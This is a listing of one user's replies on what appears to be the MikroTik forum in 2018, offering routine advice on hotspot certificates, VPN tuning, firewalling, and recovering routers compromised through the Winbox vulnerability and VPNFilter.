This is indeed a mixed content warning. The connection to the page is secure, but the page requests insecure elements such as scripts which means the integrity of the page cannot be trusted as the insecure scripts could modify it.
by R1CH
Sun Aug 05, 2018 5:08 pm
Forum: Wireless Networking
Topic: PMKID Attack - clientless WPA2/WPA PSK attack
Replies: 6
Views: 3129

Re: PMKID Attack - clientless WPA2/WPA PSK attack

This seems like it would only affect 802.1x / EAP setups.
by R1CH
Sun Aug 05, 2018 5:02 pm
Forum: General
Topic: cutting off internet
Replies: 6
Views: 616

Re: cutting off internet

Use firewall time matcher or scheduler.
by R1CH
Sun Aug 05, 2018 2:59 am
Forum: General
Topic: Problems with SSL Godaddy Hotspot
Replies: 7
Views: 912

Re: Problems with SSL Godaddy Hotspot

Everything is working fine. There is nothing more to do.

Phones open the webpage automatically as a convenience, in desktop Chrome you have to click "Connect". You cannot alter how the phones or browsers behave.
by R1CH
Sat Aug 04, 2018 3:27 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 87463

Re: Winbox vulnerability: please upgrade

It's disappointing that both the httpd vulnerability and now the winbox vulnerability required mass exploitation before Mikrotik sent an email. Why not send these emails on day 1?
by R1CH
Thu Aug 02, 2018 12:56 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 120
Views: 38257

Re: Security announcement blog

...ignored upgrading because they thought their router wasn't classified as "unsecured"... Any port open to public networks is unsecure! The point is if port is closed by firewall or by disabling service then it is considered secure. So services like OpenVPN and IPsec in Mikrotik are "unsecure" as ...
by R1CH
Wed Aug 01, 2018 8:11 pm
Forum: General
Topic: Unexpected start message
Replies: 6
Views: 637

Re: Unexpected start message

How would malware get access to run arbitrary cp commands? This looks more like a bug in RouterOS, unless there is a new exploit available to elevate winbox to shell access (which is rumored to be possible).
by R1CH
Wed Aug 01, 2018 5:03 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 120
Views: 38257

Re: Security announcement blog

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router; ... Another example that shows how important it is to read the changelog. That is why we have tried to upgrade it a little bit after few last releases in order to highlight major fixes and improvements. I would actually us...
by R1CH
Wed Aug 01, 2018 2:54 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 120
Views: 38257

Re: Security announcement blog

I also never received an email about the winbox exploit. Mikrotik claims to have sent it, does anyone actually have a copy of it?
by R1CH
Mon Jul 30, 2018 1:59 pm
Forum: General
Topic: SSL Certificate Issue
Replies: 1
Views: 245

Re: SSL Certificate Issue

Do you have hotspot enabled on any of the routers? Looks like something is intercepting your connections, or your routers are compromised and your DNS has been modified.
by R1CH
Mon Jul 30, 2018 1:57 pm
Forum: General
Topic: Mikrotik + Squid Proxy server to log HTTPS traffic
Replies: 2
Views: 941

Re: Mikrotik + Squid Proxy server to log HTTPS traffic

You cannot log HTTPS traffic. Only CONNECT is a supported Squid proxy method, meaning Squid operates in a simple TCP passthrough mode. The most you can get is the hostname that clients are connecting to, and they must be explicitly configured to use the proxy - transparent proxying does not work for...
by R1CH
Fri Jul 27, 2018 6:33 pm
Forum: General
Topic: 185.153.198.228 Has been BUSY
Replies: 9
Views: 1052

Re: 185.153.198.228 Has been BUSY

Exposing your winbox port is asking to be compromised when the next exploit is found. Best to firewall it.
by R1CH
Fri Jul 27, 2018 6:32 pm
Forum: General
Topic: chr support fast path?
Replies: 6
Views: 655

Re: chr support fast path?

The presentation says the VMXNET3 NIC supports fastpath. Are you using that?
by R1CH
Fri Jul 27, 2018 6:29 pm
Forum: General
Topic: How to optimize VPN tunnel over high latency link?
Replies: 3
Views: 552

Re: How to optimize VPN tunnel over high latency link?

If using TCP you probably need to tune the send / receive windows. A single TCP connection has a hard time reaching maximum bandwidth over high speed links. You can experiment with these settings: https://fasterdata.es.net/host-tuning/ms-windows/ RouterOS also has a single TCP connection bandwidth l...
by R1CH
Fri Jul 27, 2018 4:56 pm
Forum: Wireless Networking
Topic: Removing Mikrotik elements from beacons
Replies: 15
Views: 2288

Re: Removing Mikrotik elements from beacons

Bump.. still annoyed by the fact that anyone can see the version numbers.
by R1CH
Fri Jul 27, 2018 4:54 pm
Forum: Wireless Networking
Topic: What are the different flags when doing a scanner
Replies: 1
Views: 341

Re: What are the different flags when doing a scanner

A = active, recently appeared in a scan. If this is missing, it means the AP is no longer in range or has weak signal
P = privacy, network is secured by some method
R = RouterOS network
B = bridged RouterOS network

Unfortunately there's no way to stop advertising as a RouterOS network, this also gives away...
by R1CH
Fri Jul 27, 2018 3:00 pm
Forum: General
Topic: How to optimize VPN tunnel over high latency link?
Replies: 3
Views: 552

Re: How to optimize VPN tunnel over high latency link?

What kind of file copy? If you're trying to do Windows file sharing, it has terrible performance at higher latencies. There's no real workaround, the protocol is just not meant for WAN use. Make sure both sides are set up for SMB3 if possible as this does provide some small improvement.
by R1CH
Thu Jul 26, 2018 1:21 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 120
Views: 38257

Re: Security announcement blog

Is there a way to sign up for email announcements of new articles too?
by R1CH
Wed Jul 25, 2018 7:26 pm
Forum: General
Topic: Mikrotik Routers Compromised......please READ [SOLVED]
Replies: 8
Views: 1645

Re: Mikrotik Routers Compromised......please READ [SOLVED]

If you weren't running latest RouterOS you will have been compromised by various exploits, safest way forward is netinstall (and change all passwords).
by R1CH
Wed Jul 25, 2018 7:25 pm
Forum: General
Topic: Blocking facebook
Replies: 12
Views: 16407

Re: Blocking facebook

That doesn't really work when browsers like Firefox will soon be defaulting to DNS over HTTPS.
by R1CH
Mon Jul 23, 2018 4:31 pm
Forum: General
Topic: Block extensions downloads on HTTPS sites
Replies: 10
Views: 907

Re: Block extensions downloads on HTTPS sites

Not possible unless you own all the client devices and install MITM root certs.
by R1CH
Tue Jul 17, 2018 4:18 pm
Forum: RouterBOARD hardware
Topic: RB850Gx2 vs RB450Gx4
Replies: 49
Views: 10157

Re: RB850Gx2 vs RB450Gx4

Anyone tried getting OpenWRT running on one of these yet? Looks like a great board for non-ROS systems.
by R1CH
Mon Jul 16, 2018 2:26 pm
Forum: General
Topic: Problems with SSL Godaddy Hotspot
Replies: 7
Views: 912

Re: Problems with SSL Godaddy Hotspot

Your screenshot is showing everything working perfectly - the browser has detected the hotspot and all you have to do is click "Connect".
by R1CH
Fri Jul 13, 2018 7:37 pm
Forum: General
Topic: Router wireless speed deteriirated
Replies: 1
Views: 257

Re: Router wireless speed deteriirated

Are you sure your router isn't hacked and all the bandwidth being used by attackers? 6.39 is vulnerable to many exploits, if you have any ports exposed it's likely hacked. You should netinstall to 6.42.6 to remove any malware. If you're sure it isn't compromised, try changing channels on the wifi. M...
by R1CH
Fri Jul 13, 2018 2:38 pm
Forum: RouterBOARD hardware
Topic: CRS317 keeps calling "home" (MikroTik cloud) [SOLVED]
Replies: 1
Views: 504

Re: CRS317 keeps calling "home" (MikroTik cloud) [SOLVED]

You also need to disable timezone auto detection.
by R1CH
Fri Jul 13, 2018 2:37 pm
Forum: General
Topic: .npk files auto deleted
Replies: 18
Views: 2209

Re: .npk files auto deleted

This definitely sounds like malware that is preventing you from patching the router to a secure version. Safest way forward is to format / netinstall.
by R1CH
Mon Jul 09, 2018 7:56 pm
Forum: Announcements
Topic: Winbox v3.16 released!
Replies: 63
Views: 26775

Re: Winbox v3.16 released!

Winbox self-update is still vulnerable to MITM to execute arbitrary code. (ref: ticket 2018052822004611)
by R1CH
Mon Jul 09, 2018 7:34 pm
Forum: RouterBOARD hardware
Topic: CAP ac bad Antenna design?
Replies: 95
Views: 20921

Re: CAP ac bad Antenna design?

There is no Wave2 support in RouterOS. Maybe in RouterOS v7 when the drivers / kernel are updated.
by R1CH
Sun Jul 08, 2018 1:23 am
Forum: Wireless Networking
Topic: Backup 5GHz link for LHG 60
Replies: 4
Views: 1044

Backup 5GHz link for LHG 60

Since rain or other obstacles can cause the 60 GHz link to drop completely, I'm investigating whether to run a 5 GHz link also for redundancy. Failure should be ideally detected within a second and traffic transparently routed to the 5 GHz link until the 60 GHz link is back online. Both sides of the...
by R1CH
Sat Jul 07, 2018 2:42 pm
Forum: General
Topic: DNSSEC
Replies: 33
Views: 10085

Re: DNSSEC

Using an external resolver also fixes latency issues caused by high CPU: routed packets through the kernel still proceed, but the user-mode DNS server is starved, leading to slow DNS response. I also couldn't find a way to do DNS rebinding protection with Mikrotik, which was the main reason I switched away.
by R1CH
Sat Jul 07, 2018 2:40 pm
Forum: General
Topic: hAP ac2 crashes?
Replies: 5
Views: 827

Re: hAP ac2 crashes?

I had a wAP AC behave very similarly during a switch loop which is why I mention this. After fixing the loop all devices except the wAP AC came back without intervention.
by R1CH
Fri Jul 06, 2018 6:19 pm
Forum: Wireless Networking
Topic: Client roaming with different subnets and DHCP
Replies: 0
Views: 285

Client roaming with different subnets and DHCP

I was wondering if anyone has any experience with a single SSID roaming setup but using different subnets behind the AP. For example, two SSIDs that share the same name / key, but one assigns in 192.168.88.0/24 space and the other in 10.10.10.0/24: Would most clients issue a new DHCP request when th...
by R1CH
Fri Jul 06, 2018 6:08 pm
Forum: General
Topic: hAP ac2 crashes?
Replies: 5
Views: 827

Re: hAP ac2 crashes?

I would suspect a faulty switch or a loop / broadcast storm. Try monitoring traffic on one of the devices connected to the switch during an outage.
by R1CH
Fri Jul 06, 2018 6:06 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

I made a checking tool like that as soon as it was announced, but realized it's probably useless as this ssler module is very likely targeted to high profile victims and won't be enabled on most infections.
by R1CH
Thu Jul 05, 2018 12:17 am
Forum: General
Topic: Web Proxy Hacked
Replies: 8
Views: 2164

Re: Web Proxy Hacked

You should format and netinstall after being compromised. Winbox access can supposedly be escalated to shell access, where all kinds of malware could be lurking with no way to detect.
by R1CH
Wed Jul 04, 2018 7:51 pm
Forum: General
Topic: PCI Compliance - CVE-2015-4000
Replies: 7
Views: 826

Re: PCI Compliance - CVE-2015-4000

For command line scanning of DH parameters, give this a try: https://github.com/GDSSecurity/SSH-Weak-DH For those curious, strong-crypto=yes enables 2048 bit DH parameters and disables 3des / md5 from ciphers / HMAC but dsa keys and sha1 remain enabled. /ip ssh set strong-crypto=yes: [+] STRONG. Alg...
by R1CH
Wed Jul 04, 2018 2:56 pm
Forum: General
Topic: Block HTTPS sites
Replies: 11
Views: 1826

Re: Block HTTPS sites

Please listen to the people saying this is not possible. If anyone could redirect HTTPS, what's to stop anyone on the internet doing that to google or a banking website? Redirecting HTTPS is only possible if you also own all the client devices and have installed a MITM root certificate into the OS. ...
by R1CH
Wed Jul 04, 2018 2:24 am
Forum: RouterBOARD hardware
Topic: IEEE 802.11ac (wave 2)
Replies: 14
Views: 4746

Re: IEEE 802.11ac (wave 2)

RouterOS v7? Probably. Who knows when though...
by R1CH
Wed Jul 04, 2018 2:22 am
Forum: General
Topic: LAN side bridge forward filtering options?
Replies: 4
Views: 480

Re: LAN side bridge forward filtering options?

LAN to LAN packets won't touch your bridge - they will go directly through the ports the clients are connected to on the VLAN switch. dadaniel has the right idea - you need to configure port isolation on whatever device the clients are physically connecting to.
by R1CH
Wed Jul 04, 2018 12:40 am
Forum: General
Topic: PCI Compliance - CVE-2015-4000
Replies: 7
Views: 826

Re: PCI Compliance - CVE-2015-4000

SSH does not use TLS/SSL, using testssl.sh with it will not work. Try https://tls.imirhil.fr/ssh

Results of RouterOS SSH server don't look very promising, no strong ciphers, HMACs or host keys and plenty of bad ones. https://tls.imirhil.fr/ssh/demo.mt.lv:22
by R1CH
Tue Jul 03, 2018 5:30 pm
Forum: General
Topic: Slow ethernet directly from rb750Gr3 port 2 [SOLVED]
Replies: 9
Views: 708

Re: Slow ethernet directly from rb750Gr3 port 2 [SOLVED]

I would suggest removing those blacklist downloads, they pose a huge security risk. If someone is able to MITM your connection or the web host is compromised, your router is compromised since it's essentially executing arbitrary commands from a remote host (!).
by R1CH
Mon Jul 02, 2018 5:35 pm
Forum: General
Topic: [Feature request] Wireguard
Replies: 92
Views: 21460

Re: [Feature request] Wireguard

And please use the reference implementation! I'm getting tired of Mikrotik's re-implementations of software which introduce security bugs and miss important features.
by R1CH
Mon Jul 02, 2018 5:28 pm
Forum: Announcements
Topic: Winbox v3.16 released!
Replies: 63
Views: 26775

Re: Winbox v3.16 released!

Hopefully it uses a whitelist approach and only executes DLLs with known hashes.
by R1CH
Sat Jun 30, 2018 6:18 pm
Forum: General
Topic: Block HTTPS sites
Replies: 11
Views: 1826

Re: Block HTTPS sites

Blocking is possible, redirecting is not as it would require breaking HTTPS security. Simply drop outbound TCP/UDP port 443.
by R1CH
Fri Jun 29, 2018 9:21 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1599

Re: Why am I getting this firewall entry???

I think I was a little too quick with my first assessment. After some more thought I believe this is actually closer to your network. Something in the outbound network path is generating the TTL exceeded messages with the wrong interface / IP address and these are injected back into the internet. Yo...
by R1CH
Fri Jun 29, 2018 5:29 pm
Forum: General
Topic: hotspot doesn't open browser popup on captive portal when clients connect
Replies: 4
Views: 1682

Re: hotspot doesn't open browser popup on captive portal when clients connect

You shouldn't have any whitelisting. If you allow those domains then the device will fail hotspot detection and never prompt. There's no point trying to trick the phones, you'll end up with annoyed non-users who can't access the internet and annoyed users who can't log in to your portal.
by R1CH
Thu Jun 28, 2018 6:14 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1599

Re: Why am I getting this firewall entry???

That's correct, it's caused by a non-translated packet exiting from a remote NAT and making it across the internet with an invalid source IP. They're quite rare, but if you run a busy enough network / website you'll see quite a lot of them. Some stats from one of my websites which filter these on IN...
by R1CH
Thu Jun 28, 2018 5:17 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1599

Re: Why am I getting this firewall entry???

This is caused by a combination of bad ISPs that don't do BCP38 and bad routers that don't NAT properly. An outbound packet from your network goes across the internet to some host behind a poor quality NAT router. The host PC / network responds with an ICMP error (TTL exceeded, port unreachable or s...
by R1CH
Thu Jun 28, 2018 2:58 pm
Forum: Wireless Networking
Topic: Users Not Being Directed to the Hotspot Login Screen
Replies: 6
Views: 1168

Re: Users Not Being Directed to the Hotspot Login Screen

Haven't used hotspot before, but this certainly doesn't look right:
/ip dhcp-server network
add address=192.188.254.254/32
   IPv4 Address. . . . . . . . . . . : 192.188.254.251(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.255
You probably want a /24 network at least?
by R1CH
Wed Jun 27, 2018 9:34 pm
Forum: General
Topic: fasttrack connection question
Replies: 3
Views: 310

Re: fasttrack connection question

Unfortunately this will not work. Your access control rules need to run before marking the connection for fasttrack, once the connection is fasttracked it will no longer hit the forward rule table.
by R1CH
Wed Jun 27, 2018 7:50 pm
Forum: General
Topic: WPA3 on existing Mikrotik routers/APs [SOLVED]
Replies: 11
Views: 8171

Re: WPA3 on existing Mikrotik routers/APs [SOLVED]

Hmm I just looked it up, 802.11w is actually required for 802.11ac certification, so Mikrotik is technically shipping uncertified implementations :D. Hopefully they don't ignore it for WPA3 too. Regarding my other points - with spectral scan I meant an actual RF scan of the frequency, not a simple p...
by R1CH
Wed Jun 27, 2018 2:46 pm
Forum: General
Topic: WPA3 on existing Mikrotik routers/APs [SOLVED]
Replies: 11
Views: 8171

Re: WPA3 on existing Mikrotik routers/APs [SOLVED]

The SAE handshake doesn't look like a huge innovation, was hoping for something more in line with modern TLS, but I guess that's what happens when you have for-profit industry alliances vs open standards bodies. The big question is how long will it take Mikrotik to implement WPA3? We have no 802.11a...
by R1CH
Wed Jun 27, 2018 2:37 pm
Forum: General
Topic: /ip cloud (ddns + time) = Error: request timed out (90% of time)
Replies: 9
Views: 9406

Re: /ip cloud (ddns + time) = Error: request timed out (90% of time)

There still seems to be a major DNS misconfiguration on the domain used for the IP cloud services. Perhaps fixing this would improve reliability.

https://r-1.ch/r1dns/dnscheck.cgi?domain=mynetname.net
by R1CH
Wed Jun 27, 2018 1:40 am
Forum: General
Topic: S.O.S New vurnelabilty on 6.42.3 ????? NO [SOLVED]
Replies: 26
Views: 11695

Re: S.O.S New vurnelabilty on 6.42.3 ????? [SOLVED]

Did you do a reinstall after being compromised? Winbox access can be escalated to shell access, where attackers can drop undetectable backdoors and other exploits. Changing passwords might be OK if you're lucky and didn't get hit by a sophisticated exploit, but reinstalling is the only truly safe op...
by R1CH
Mon Jun 25, 2018 8:14 pm
Forum: General
Topic: unknown admin with unknown IP address loges in my mikrotik router via API [SOLVED]
Replies: 6
Views: 800

Re: unknown admin with unknown IP address loges in my mikrotik router via API [SOLVED]

You should also change all passwords after updating, since all user accounts are exposed.
by R1CH
Thu Jun 21, 2018 12:40 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

toknowall.com is a sinkhole, nothing bad will come from hosts contacting it. Cloudflare IPs rotate often, you are probably blocking hundreds or thousands of legitimate sites with such wide rules.

You should instead redirect toknowall.com locally and monitor / block hosts that way.
by R1CH
Wed Jun 20, 2018 7:28 pm
Forum: General
Topic: Maximum speed on 10 Gb port for mikrotik CCR1036
Replies: 6
Views: 715

Re: Maximum speed on 10 Gb port for mikrotik CCR1036

9.9Gbps maybe you have 1.25Gbps SFP module. Single stream? Wasn't there a limitation, with the way ROS (not) distributed the load of a single stream, among the cores? Was it addressed recently? I think you have the right idea here. If it's a single TCP stream with no firewall rules then ~ 1.2gbps s...
by R1CH
Wed Jun 20, 2018 7:21 pm
Forum: General
Topic: Windows 10 Hotspot Problem (V6.38.1)
Replies: 2
Views: 475

Re: Windows 10 Hotspot Problem (V6.38.1)

You should be more concerned about running such an old version of RouterOS! Your router may already be compromised due to various remote exploits in that version, update it ASAP and check for signs of compromise. As for the hotspot problem, have you tried with different browsers? I would expect the ...
by R1CH
Tue Jun 19, 2018 7:13 pm
Forum: Announcements
Topic: v6.42.4 [current]
Replies: 93
Views: 16190

Re: v6.42.4 [current]

I'm also not a fan of the labeling of firmware by RouterOS version. Previously, after updating RouterOS, I could easily see if firmware was outdated and choose to do a 2nd reboot. Now it always appears outdated, even if there were no changes between versions.
by R1CH
Tue Jun 19, 2018 6:54 pm
Forum: Scripting
Topic: Adding SSL to API
Replies: 2
Views: 884

Re: Adding SSL to API

You should use fsockopen ("tls://$ip"). Be aware that without a valid certificate this will fail.
by R1CH
Tue Jun 19, 2018 6:35 pm
Forum: General
Topic: hotspot doesn't open browser popup on captive portal when clients connect
Replies: 4
Views: 1682

Re: hotspot doesn't open browser popup on captive portal when clients connect

Make sure you're redirecting all HTTP requests to your portal, don't allow whitelists for gstatic.com etc. Other than that it's up to the device, you can't really influence it.
by R1CH
Mon Jun 18, 2018 7:54 pm
Forum: General
Topic: bug persists after updating to 6.42.3
Replies: 14
Views: 6135

Re: bug persists after updating to 6.42.3

If you didn't change passwords after upgrading to fix the winbox exploit, this is likely how they are gaining access. Change all passwords, preferably after netinstall to ensure no remaining backdoors.
by R1CH
Mon Jun 18, 2018 7:43 pm
Forum: Wireless Networking
Topic: hacking-router
Replies: 2
Views: 1144

Re: hacking-router

Your router is compromised due to the winbox bug, you should format / netinstall and change all passwords. Simply updating is not enough, as you must also change all passwords. Removing the scripts will prevent the problem for now, but who knows what other backdoors are lurking.
by R1CH
Mon Jun 18, 2018 7:08 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

Any signed cert should be fine, price is not important, even a free one from Let's Encrypt should work. ERR_SSL_VERSION_OR_CIPHER_MISMATCH seems to indicate either the hotspot or your browser isn't using modern protocols / ciphers. I don't know if there are any options in RouterOS, but make sure to ...
by R1CH
Mon Jun 18, 2018 4:57 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

Telnet is well known to be insecure, SSH is the replacement for it (although why telnet is still provided and enabled by default is another question...) Winbox is a proprietary protocol that claims to be "secure" but is vulnerable to MITM, so the fault lies with it. Hopefully this is a pointless discus...
by R1CH
Fri Jun 15, 2018 6:49 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

The only email I got was about the old httpd exploit (below). Maybe something went wrong with the sending of the emails? Subject: MikroTik: URGENT security advisory "It has come to our attention that a rogue botnet is currently scanning random public IP addresses to find open Winbox (8291) and WWW (...
by R1CH
Fri Jun 15, 2018 6:37 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

For vulnerabilities that allow remote code execution or bypassing of authentication, Mikrotik should really be sending out security advisory emails to every registered customer / active forum user. The winbox exploit for example is much worse than the httpd bug, and that was deserving of an email....
by R1CH
Fri Jun 15, 2018 5:22 pm
Forum: General
Topic: Login failure critical notification
Replies: 2
Views: 393

Re: Login failure critical notification

Bandwidth test server is hidden! It isn't listed under services but under tools / btest server. If people are able to try to log into it though, this suggests your firewall configuration is incomplete.
by R1CH
Thu Jun 14, 2018 7:17 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

There seems to be a missing intermediate cert, I'm not entirely sure how RouterOS handles this but try importing the following instead (I added the intermediate cert to the chain).
by R1CH
Thu Jun 14, 2018 4:46 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

That message means the .crt you supplied to the hotspot wasn't signed properly. Make sure it's the certificate you got from namecheap and not one generated by RouterOS.

You can also link the .crt file here and I can take a look. Make sure you never post the private key though!
by R1CH
Wed Jun 13, 2018 6:29 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

If you're running 6.40.1 your router may already be compromised as you have not installed critical security patches, you should update ASAP and check for signs of compromise (modified DNS, additional users, VPN tunnels, etc). You can use testssl.sh from any Linux system and test it against your hotspot....
by R1CH
Wed Jun 13, 2018 4:51 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

Make sure your RouterOS is up to date. You can use something like https://testssl.sh for verifying that TLS support is working correctly.
by R1CH
Wed Jun 13, 2018 4:45 pm
Forum: General
Topic: problems resolving IP Cloud addresses
Replies: 13
Views: 1360

Re: problems resolving IP Cloud addresses

GTLD nameservers are still returning the old records. May want to check that.

https://r-1.ch/r1dns/dnscheck.cgi?domain=mynetname.net
by R1CH
Tue Jun 12, 2018 2:38 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

Yes, you need to be able to prove ownership of it in some way, eg email to postmaster@example.com should be receivable or if you use free Let's Encrypt cert, challenge files at example.com/.well-known/acme-challenge.
by R1CH
Mon Jun 11, 2018 7:02 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

You need a FQDN to be able to get a valid CA signed cert. Namecheap isn't going to allow you to sign "myCa" since you have no proof of ownership over that name.

Use something like hotspot.your-isp.com.
by R1CH
Mon Jun 11, 2018 12:54 pm
Forum: RouterBOARD hardware
Topic: IEEE 802.11ac (wave 2)
Replies: 14
Views: 4746

Re: IEEE 802.11ac (wave 2)

There's no Wave2 support for anything yet.
by R1CH
Fri Jun 08, 2018 5:23 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

Thanks, so other than the Mikrotik update service there is really no need for port 80 traffic on the output chain (from the router either with a source port of 80 or with a destination port of 80). Be aware that compromised devices could serve 2nd stage payloads from any port - blocking OUTPUT port...
by R1CH
Thu Jun 07, 2018 7:31 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

One thing I have started doing as a preventative measure - block everything in the OUTPUT chain except necessary services (eg dhcp client, sntp client, etc). Most exploits can only carry a very small payload, which often downloads a "real" payload from some other infected device. By restricting outb...
by R1CH
Thu Jun 07, 2018 7:29 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

So, anybody got some ideas on how to do this and what can be found/checked/modified/fixed/enhanced/expanded? I would guess the bad guys already do something like this all of the time when looking for possible exploits on Internet connected devices.
This is definitely possible, you should be able ...
by R1CH
Thu Jun 07, 2018 7:22 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

Just for the record, I don't think people need to check changelogs "constantly" but probably at least once a year might be cool. Maybe even every six months? Might be a stretch but just actually *looking* would be a start for most.
The winbox exploit was a 0-day - meaning it was being exploited in ...
by R1CH
Thu Jun 07, 2018 7:18 pm
Forum: Announcements
Topic: Winbox 3.14 released!
Replies: 77
Views: 24527

Re: Winbox 3.14 released!

This version 3.14 works very slowly before connecting to the router. In version 3.13 or 3.12 is connect very fast to router
*) make all connections in secure mode (all data is encrypted with AES128-CBC-SHA);
so it requires more CPU processing power from both sides and more information exchange. Thi...
by R1CH
Thu Jun 07, 2018 5:20 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

There is unfortunately no easy way to tell, since Mikrotik doesn't allow us shell access to our routers to perform this kind of examination. There is a "check installation" feature but unfortunately it does not check if there are files on the router that are unaccounted for, even though this has be...
by R1CH
Thu Jun 07, 2018 4:43 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

how to determine if my router is infected?
There is unfortunately no easy way to tell, since Mikrotik doesn't allow us shell access to our routers to perform this kind of examination. Lack of shell access also makes it hard to tell if upgrading a compromised device actually removes the compromise, ...
by R1CH
Thu Jun 07, 2018 3:48 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

The fact that Mikrotik is still on the list due to them seeing Mikrotik routers still being hit by this means one thing only for Mikrotik users. They have failed to keep their routers current and are still running over a YEAR OLD (plus) version of ROS. Regardless of this virus attack, that is just ...
by R1CH
Thu Jun 07, 2018 2:53 pm
Forum: General
Topic: HELP! Strange port forwarding behaviour in 951G-2HnD [SOLVED]
Replies: 3
Views: 671

Re: HELP! Strange port forwarding behaviour in 951G-2HnD

I've seen several NVR systems where the web interface runs on one port, but the video streams are all separate ports that are connected to directly via RTP / RTSP. You should connect locally and use a utility like TCPView to figure out which ports are being accessed, then forward all of them.
by R1CH
Wed Jun 06, 2018 7:25 pm
Forum: General
Topic: Which mikrotik router for OpenVPN
Replies: 8
Views: 2624

Re: Which mikrotik router for OpenVPN

I would strongly advise against OpenVPN on Mikrotik for the above reasons. Performance is very poor with TCP-in-TCP, see http://sites.inka.de/bigred/devel/tcp-tcp.html for explanations.
by R1CH
Wed Jun 06, 2018 4:32 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

A new technical update was published, which expands the compromised device list to include almost all Mikrotik boards (CCR1009 (new), CCR1016, CCR1036, CCR1072, CRS109 (new), CRS112 (new), CRS125 (new), RB411 (new), RB450 (new), RB750 (new), RB911 (new), RB921 (new), RB941 (new), RB951 (new), RB952 ...
by R1CH
Wed Jun 06, 2018 2:22 pm
Forum: General
Topic: RouterOS v7.0 beta1 - when?
Replies: 609
Views: 152029

Re: RouterOS v7.0 beta1 - when?

One reason is probably that when you use opensource software and keep tracking all the updates, you end up with more and more bloated software that does not fit into a space-limited router anymore. It works fine on the PC platform where space and other resource usage (CPU) has grown with the code, ...
by R1CH
Tue Jun 05, 2018 4:17 pm
Forum: General
Topic: RouterOS v7.0 beta1 - when?
Replies: 609
Views: 152029

Re: RouterOS v7.0 beta1 - when?

This is the difficulty :D If we were using all open source code, it would be easy to upgrade. Now we must only rely on ourselves to upgrade all programs.
Why is Mikrotik so against using open source software? We would have working 802.11ac Wave2, 5 GHz spectral scan, OpenVPN UDP support, more secur...
by R1CH
Tue Jun 05, 2018 2:26 pm
Forum: Wireless Networking
Topic: New standard 802.11ax
Replies: 25
Views: 6477

Re: New standard 802.11ax

Looks like 802.11ax consumer devices will be hitting the market later this year. I really hope Mikrotik is working on something too!

https://www.anandtech.com/show/12871/as ... ax-routers
by R1CH
Sun Jun 03, 2018 6:58 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

Again and again ... it seems be kind of sport nowadays to ask "Is Mikrotik volunerable because someone is scanning particular port?" If you disable or limit sources's IPs for all new incoming connections then there should be no problem at all. If you not secure your router then offenders will try t...
by R1CH
Sat Jun 02, 2018 10:47 pm
Forum: General
Topic: Blocking Virus from Mikrotik
Replies: 15
Views: 3226

Re: Blocking Virus from Mikrotik

Perhaps your router was compromised and an attacker is intercepting your DNS.
by R1CH
Sat Jun 02, 2018 7:37 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

Apparently VPNFilter is now scanning for port 2000 (btest server) on Mikrotik routers. Another exploit? Not many admins are aware that this service runs by default.
by R1CH
Fri Jun 01, 2018 7:30 pm
Forum: General
Topic: I can't set a DNS name that starts with a digit.
Replies: 3
Views: 652

Re: I can't set a DNS name that starts with a digit.

Seems like Mikrotik is not RFC compliant here.
2.1 Host Names and Numbers
The syntax of a legal Internet host name was specified in RFC-952 [DNS:4]. One aspect of host name syntax is hereby changed: the restriction on the first character is relaxed to allow either a letter or a digit. Host software ...
by R1CH
Thu May 31, 2018 6:25 pm
Forum: General
Topic: Upgraded to 6.42.3 - some SSL trouble from clients
Replies: 4
Views: 690

Re: Upgraded to 6.42.3 - some SSL trouble from clients

